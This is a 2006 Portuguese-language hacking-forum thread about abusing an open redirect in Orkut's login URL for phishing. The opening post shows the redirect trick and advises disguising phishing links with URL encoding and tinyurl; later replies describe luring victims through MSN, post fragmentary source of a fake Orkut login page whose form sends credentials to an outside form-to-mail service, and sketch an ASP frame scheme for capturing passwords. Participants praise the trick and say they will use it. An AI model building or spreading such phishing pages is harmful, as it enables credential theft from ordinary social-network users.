Pequena "falha" do orkut que dá pra usar com Phishing..

Started by whit3_sh4rk, 23 de March , 2006, 11:02:14 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1 2
User actions

whit3_sh4rk

23 de March , 2006, 11:02:14 AM Last Edit: 23 de March , 2006, 11:11:08 AM by whit3_sh4rk
Bom, eu estive dando uma olhada em alguns métodos e vi que nenhum até agora explorou uma coisa boba mas que pode enganar mta gente, e até mesmo os "sabidos"..

Bom, pelo menos comigo, não é sempre, mas ás vezes quando entro no Orkut, na tela de loguin, observo na URL, acho que hoje em dia já não deixam mais na cara, mas fica assim:
https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Home.aspx

As vezes com encriptação de URL mesmo substituindo alguns caracteres, mas é assim mesmo..

O que é isso? Bom, serve para que, quando você se logar, ele ir para a página Home do orkut, onde tem seu perfil, suas comu, etc.. Mas aí, como sou um pouco curioso e gosto de dar uma fuçada, fiz o seguinte:
https://www.orkut.com/GLogin.aspx?done=http://www.darkers.com.br/

 :D

Espero que gostem dessa "novidade".. bom sei lá se fui o primeiro a descobrir ou encontrar isso, mas o importante é que fui o primeiro a divulgar pra vcs ae..

EDIT: Para a sua phishing não ficar mto na cara, use a codificação HTML e também um serviço grátis, como o tinyurl.com, assim sua URL ficará praticamente ilegível, exemplo:
http://www.orkut.com/Community.aspx?cmm=1104126

Mais informações sobre a codificação de URL

[]s

DarkGenesis

#1
23 de March , 2006, 11:36:45 AM Last Edit: 23 de March , 2006, 11:38:26 AM by DarkGenesis
Parabêns whit3_sh4rk pêla descoberta.  ;D
Achei muito interesante.
Até fiz minha pequena SE com ela.
Exemplo:
Muitos pedem seu perfil do orkut pêlo msn, basta você criar sua página fake do orkut e depois do login faça que redireçione para o seu perfil. Bingo.
Ninguém nêm vai notar que passou sua senha.
Realmente essa sua dica faz qualquer destraido cair em Seing.
Valew.

J.spY

#2
23 de March , 2006, 11:45:04 AM
Po cara legal a descoberta...

Só uma coisa, hoje eu to meio lerdo, não entendi muito bem a finalidade de colocar uma pagina fake após a include...

Se eu logar aqui (https://www.orkut.com/GLogin.aspx?done= ... om%2fqjdoz) a minha senha vai para você?

Vlw

"...É melhor ficar calado deixando que todos pensem que você é um idiota, do que abrir a boca e não deixar a menor dúvida®..."

whit3_sh4rk

#3
23 de March , 2006, 11:52:42 AM
[J.spY]
Você irá logar-se normalmente no Orkut, mas ao invés de ir para a sua página principal, onde tem seus amigos, suas comu, etc, você é redirecionado para a URL que eu coloquei após o done=...

[]s

bironet

#4
23 de March , 2006, 01:54:31 PM
kkkkk Jah vi isso funcionando kakaka
Massa d+
rsrs... PEnsei q isso era conhecido por aki
kakaka

Shady

#5
23 de March , 2006, 03:44:50 PM
Ponto. Parabens, ws!


Mundus Vult Decipi

Fox

#6
23 de March , 2006, 05:23:23 PM
Boa..essa ai merece uns 3 pontos!
Valew fera...

Reeves

#8
26 de March , 2006, 05:37:19 AM
bem legau kra!
:D
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

Anonymous

#9
26 de March , 2006, 11:10:31 AM
Muito bom post, se o Shady não tivesse já te dado ponto eu daria!

Anonymous

#10
28 de March , 2006, 02:42:11 AM Last Edit: 28 de March , 2006, 12:13:45 PM by hector
Bom, depois de ter alterado a pagina do orkut...usei a falha q nosso amigo whit3_sh4rk encontro, ficando desse geito https://www.orkut.com/GLogin.aspx?done= ... xxx.com.br redirecionado a minha pagina falsa!
  Hospedei no http://www.v10.com.br(usa propagandas) se alguem souber alguma dica ou host free q suporte ftp...agradeso!
 
  Codigo Fonte *pagina orkut*










action=http://free4web.pl/Form2Mail/ method=post>value=xxxxxxxxxxxx@hotmail.com name=email>value=xxxxxxxxxxxx@hotmail.com name=email>

 
 
   
Efetue login do orkut      class="orkut pink">

     
       
       
 
   
 
   
   
 
   
   
 
   
   
 
   
   
 
   
   
 
   
   
 
   

     

     
Nome de usuario/E-mail:
     
      value=https://www.orkut.com/RedirLogin.aspx?msg=0&page=http%3A%2F%2Fwww.orkut.com%2F
      name=continue> https://www.orkut.com/GLogin.aspx
      name=followup>       type=hidden value=2 name=nui>
            name=Email>       class="gaia le val" id=login size=18 name=login>
Senha:       name=Passwd>
      name=PersistentCookie>  Salvar as minhas informações neste
      computador.

   
    height=33>      href="https://www.google.com/accounts/ForgotPasswd?continue=https%3A%2F%2Fwww.orkut.com%2FRedirLogin.aspx%3Fmsg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&service=orkut&hl=pt-BR"
      target=_top>Esqueceu a sua senha?







1



                                                   

 Lembrando esse e meu 1 post...desculpa se fiz algo errado!
 

Security

#11
29 de March , 2006, 01:09:55 AM Last Edit: 29 de March , 2006, 01:12:52 AM by Security
Alguem pode pfv fazer um tutorial ou sei la :P
https://www.orkut.com/GLogin.aspx?done= ... ing.com.br
ae fazer
http://www.orkut.com/Community.aspx?cmm=00622
ae me falem como fazer plx^^
-
entrei no >
http://tinyurl.com/
e nao entedi mas ^^
--
e tpw...
https://www.orkut.com/GLogin.aspx?done= ... ing.com.br
ae depois q o kra por a senha como eu fasso?
pra depois q ele digita a senha etc..redirencionar pro meu perfiL?
-
te+

Anonymous

#12
29 de March , 2006, 03:28:24 AM Last Edit: 29 de March , 2006, 03:30:29 AM by Anonymous
Afff... o que tem demais nisso? se o código do orkut fosse escrito em php provavelmete teria algo do tipo:

if($senha == $senhadobancodedados)
 header("location: $done");

Ta todo mundo falando: "ual, que bela descoberta", "ótimo isso ai"... afff.. o que tem demais??? é apenas um redirecionamento....

nem vou comentar sobre os que nao entenderam como funciona isso!

kmrafa

#13
02 de May , 2006, 04:44:44 PM
@lammer

realmente, é simples para entender..

pessoal que não entendeu tentem escrever e um jeito melhor pq eu sinceramente não compreendi em que "parte" vocês não entenderam...

Lammer, eu acho que nao foi a descoberta do século, mais é interessante para muitos, e para mim também...

E já que é tão ´"fácil" porque não havia postado antes essa falha "boba" como você diz...

"o que tem demais?"? para você talvez nada, mais para muitos tem sim, e não precisa ficar com inveja ;)

whit3_sh4rk, bem legal kara.. vou usar até...ehhe


abraços..

Anonymous

#14
10 de May , 2006, 04:53:30 PM
Sei de uma técnica melhorzinha.

Faça em asp, com o respectivo top frame e seu iframe.

No action do form do iframe, coloque uma página como por exemplo 'ServiceLoginBoxAuth.asp'.

Nesta mesma, crie uma conexão com o form da página anterior, no qual irá primeiramente capturar login e  senha e logo após usará estes mesmos dados em um form, sendo que ao der 'load' ele irá submitar os dados que pegou da página anterior, sendo o action o orkut.

Ex: <- sendo que nesse form, estará os mesmos dados da página anteror (login e senha)

Existe outro método mais simples do que esse, mas por enquanto não irei postar (risco de plágio eminente) hehehehe

Edit: tinha feito esse post no tópico errado e trouxe para cá hehehe
Print
Go Up Pages1 2
User actions